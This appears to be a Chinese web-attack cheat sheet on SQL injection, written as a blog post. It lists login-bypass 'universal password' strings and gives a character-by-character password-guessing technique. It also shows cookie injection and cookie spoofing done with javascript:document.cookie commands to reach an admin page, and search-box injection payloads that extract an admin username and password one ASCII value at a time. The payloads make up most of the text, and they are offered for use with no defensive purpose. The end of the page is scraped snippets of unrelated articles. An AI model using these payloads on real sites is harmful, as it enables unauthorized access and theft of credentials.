数据库其他注入思路 - 万能密码 - cookie注入 -搜索型注入
另类登录注入形式:
经常有一类验证(ASP,PHP,JSP均存在),先判断user是否存在,ASP为例子:"select password from admin where user_name='"&request("user_name")&"'";然后再判断密码MD5与之对比。
猜解思路可以构造,user_name: xxx' and password>'a 如果password第一位大于a,则继续user_name: xxx' and password>'b.
seelct * from admin where username='admin' and password=''注入方法:
万能用户名: xxx' union select * from users/*
select * from admin where username=admin and password=pass注入方法:
账户:777 密码:999 union select * from admin;
万能密码:
用户名:admin'or''='
密码:'or''=' username:' or 1=1 or ''=' passwd:随便写 'or'='or'
'or''='
'or 1=1
"or"="
'or 1=1/* php
"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or 1=1/*
'or"="a'='a
'or' ''=''
'or''='
'or''=''or''=' !!!!!
'or'=''
'or'='or'
'or.'a.'='a
'or1=1--
'or''='
a'or' =--
a'or'=--
or 'a'='a'
or =--
or1=--
cookie注入:
http://xxxx/view.asp?id=23
先访问http://xxxx/view.asp?id=23 接着在浏览器里输入:
javascript:alert(document.cookie="id="+escape("23 and 1=1"))
再访问http://xxxx/view.asp(未出错) 再输入:javascript:alert(document.cookie="id="+escape("23 and 1=2"))
再访问:http://xxxx/view.asp(出错) 该页面出错就表示可以用Cookie注入。
cookie欺骗
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));
javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));
javascript:alert(document.cookie="admindj="+escape("1"));
然后login.asp改为admin_index.asp
搜索型注入
例如:
判断注入
%' and 1=1 and '%' ='
%' and 1=2 and '%' =' 判断是否存在表
%'and(select count(*)from admin)>0 and '%'='
判断是否存在字段段
%'and(select top 1 len(username)from admin) and '%'='
%'and(select top 1 len(password)from admin) and '%'='
猜字段中的内容范围
%'and(select top 1 asc(mid(username,1,1))from admin)>102 and '%'=' %'and(select top 1 asc(mid(username,1,1))from admin)>40 and '%'=' %'and(select top 1 asc(mid(username,1,1))from admin)=97 and '%'='
%'and(select top 1 asc(mid(username,2,1))from admin)=100 and '%'='
%'and(select top 1 asc(mid(username,3,1))from admin)=109 and '%'='
%'and(select top 1 asc(mid(username,4,1))from admin)=105 and '%'='
%'and(select top 1 asc(mid(username,5,1))from admin)=110 and '%'=' %'and(select top 1 asc(mid(password,1,1))from admin)=49 and '%'='
%'and(select top 1 asc(mid(password,2,1))from admin)=52 and '%'='
%'and(select top 1 asc(mid(password,3,1))from admin)=50 and '%'='
%'and(select top 1 asc(mid(password,4,1))from admin)=49 and '%'='
%'and(select top 1 asc(mid(password,5,1))from admin)=53 and '%'='
%'and(select top 1 asc(mid(password,6,1))from admin)=68 and '%'='
%'and(select top 1 asc(mid(password,7,1))from admin)=51 and '%'='
%'and(select top 1 asc(mid(password,8,1))from admin)=49 and '%'='
%'and(select top 1 asc(mid(password,9,1))from admin)=50 and '%'='
%'and(select top 1 asc(mid(password,10,1))from admin)=49 and '%'='
%'and(select top 1 asc(mid(password,11,1))from admin)=57 and '%'='
%'and(select top 1 asc(mid(password,12,1))from admin)=52 and '%'='
%'and(select top 1 asc(mid(password,13,1))from admin)=43 and '%'='
%'and(select top 1 asc(mid(password,14,1))from admin)=51 and '%'='
%'and(select top 1 asc(mid(password,15,1))from admin)=68 and '%'='
%'and(select top 1 asc(mid(password,16,1))from admin)=51 and '%'='
数据库其他注入思路 - 万能密码 - cookie注入 -搜索型注入的更多相关文章
- 注入语句详解(get注入,cookie注入,搜索型注入等)
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''=' 拆半法 ###################################### and exists (select ...
- Sqlserver2008+搜索型注入技术
简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞.然后搜索%,如果正常返回,说明95%有洞了. 然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息 ...
- Sqli-LABS通关笔录-11[sql注入之万能密码以及登录框报错注入]
在这一关卡我学到了 1.万能密码的构造,大概的去揣测正常的SQL语句是如何的. 2. 3. 00x1 SQL万能密码的构造 在登录框当中可以添加了一个单引号.报错信息如下所示: 据此报错,我们大概的可 ...
- 实验3 SQL注入原理-万能密码注入
实验目的 (1)理解[万能密码]的原理 (2)学习[万能密码]的使用 实验原理 一.访问目标网站 1.选择一个存在漏洞的论坛 http://192.168.1.3:8009 进入 2.输入用户名[ad ...
- 从c#角度看万能密码SQL注入漏洞
以前学习渗透时,虽然也玩过万能密码SQL注入漏洞登陆网站后台,但仅仅会用,并不理解其原理. 今天学习c#数据库这一块,正好学到了这方面的知识,才明白原来是怎么回事. 众所周知的万能密码SQL注入漏洞, ...
- pikachu-搜索型注入 #手工注入
1.搜索型注入漏洞产生的原因: 在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索型注入漏洞,又称文本框注入. 2.搜索型注 ...
- 深入浅出带你玩转sqlilabs(三)--GET,POST,COOKIE,万能密码注入
常见提交方式下的注入漏洞 WEB应用在数据传递接受中,针对SQL注入安全漏洞,由于数据大小,格式等原因,脚本在接受传递时会有多种传递方式,传递方式的不同将影响到安全测试的不同 第一点:数据常见提交方式 ...
- sql注入问题 java中将MySQL的数据库验证秘密加上 ' or '1'= '1 就可以出现万能密码
password的字符串中,加上 ' or '1'= '1 就可以制作出万能密码. 原因如下: 原代码中密码是123456 执行数据库查询语句 实际上执行的SQL语句是: select * from ...
- 万能密码的SQL注入漏洞其PHP环境搭建及代码详解+防御手段
目录 环境搭建 session会话 环境搭建代码 创建数据库脚本 登录界面html: 查询数据库是否为正确的账号密码php代码 连接数据库php代码: 注销登录代码(即关闭session会话) 登录成 ...
随机推荐
- Shell编程-03-Shell中的特殊变量和扩展变量
目录 特殊变量 变量扩展 特殊变量 在Shell中的特殊变量主要分别两种位置参数变量.状态变量两种. 位置参数变量 Shell中的位置参数变量主要是指$0.$1.$#等,主要用于从命令 ...
- Appium之启用手机桌面APP的多种方法
方法一: 其实之前的随笔 Appium之连续启动多个应用(APP)中已经介绍了可以用appium下的start_activity()方法来启动一个应用,那这里就不再说明啦. 方法二: 因为有时用sta ...
- ZOJ2388 Beat the Spread! 2017-04-16 19:18 91人阅读 评论(0) 收藏
Beat the Spread! Time Limit: 2 Seconds Memory Limit: 65536 KB Superbowl Sunday is nearly here. ...
- 12.1.2: How to Modify and Enable The Configurable Home Page Delivered Via 12.1.2 (Doc ID 1061482.1)
In this Document Goal Solution References APPLIES TO: Oracle Applications Framework - Ver ...
- Linux(一) - Unix&Linux 历史
Unix Unix 的诞生 Unix的历史可以追溯到20世纪60年代中期,当时麻省理工学院,AT&T,贝尔实验室和通用电气公司联合开发了一种名为Multics的操作系统,Multics 中存在 ...
- C#语言各个版本特性(一)
一.c#版本中添加的功能: C#2.0 泛型 部分类型 匿名方法 迭代器 可空类型 Getter / setter单独可访问性 方法组转换(代表) Co- and Contra-variance fo ...
- .net图表之ECharts随笔08-bar柱状图
之前一直都是跟着修改demo,感觉用得很吃力,现在结合上配置手册就好很多了,其实说到底就是参数的配置,所以配置手册尤为重要. 当然,这其中还是很多坑,希望可以找到对应的解决方案吧!!! 1. tool ...
- 限制html文本框input只能输入数字和小数点
代码: <input type="text" class="txt" name="qty" value="" on ...
- 字节码执行方式--解释执行和JIT
此文已由作者赵计刚薪授权网易云社区发布. 欢迎访问网易云社区,了解更多网易技术产品运营经验. 1.两种执行方式: 解释执行(运行期解释字节码并执行) 强制使用该模式:-Xint 编译为机器码执行(将字 ...
- XSS结合JSONP获取网站访客社交账号信息
我在本地环境搭建了一个WordPress网站,并在该网站中植入JavaScript文件.如果访客在浏览网站时登录了百度账号,该js文件能够利用JSONP获取网站访客的百度账号信息. 具体情况如下: 1 ...